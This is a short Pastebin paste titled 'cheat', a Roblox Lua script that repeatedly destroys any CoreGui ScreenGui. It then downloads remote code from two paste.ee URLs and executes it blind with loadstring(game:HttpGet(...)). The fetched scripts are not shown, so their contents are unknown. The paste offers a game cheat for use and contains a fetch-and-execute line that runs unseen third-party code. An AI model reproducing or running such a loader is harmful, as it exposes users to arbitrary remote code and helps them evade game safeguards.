fafa21212

cheat

Jun 12th, 2025
15
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.87 KB | Gaming | 0 0
  1. local CoreGui = game:GetService("CoreGui")
  2. local guiNameToBlock = "ScreenGui"
  3.  
  4. local function deleteUnwantedGui()
  5. local gui = CoreGui:FindFirstChild(guiNameToBlock)
  6. if gui then
  7. print("Removing unwanted ScreenGui from CoreGui:", guiNameToBlock)
  8. gui:Destroy()
  9. end
  10. end
  11.  
  12. deleteUnwantedGui()
  13.  
  14. CoreGui.ChildAdded:Connect(function(child)
  15. if child.Name == guiNameToBlock then
  16. print("Detected unwanted ScreenGui, deleting it.")
  17. child:Destroy()
  18. end
  19. end)
  20.  
  21. task.spawn(function()
  22. while true do
  23. deleteUnwantedGui()
  24. task.wait(0.5)
  25. end
  26. end)
  27.  
  28. local success, result = pcall(function()
  29. loadstring(game:HttpGet("https://paste.ee/r/yZURtW7I"))() --- here
  30. end)
  31.  
  32. if not success then
  33. warn("Failed to load external script:", result)
  34. end
  35.  
  36. loadstring(game:HttpGet("https://paste.ee/r/u0LHEGer"))()
Add Comment
Please, Sign In to add comment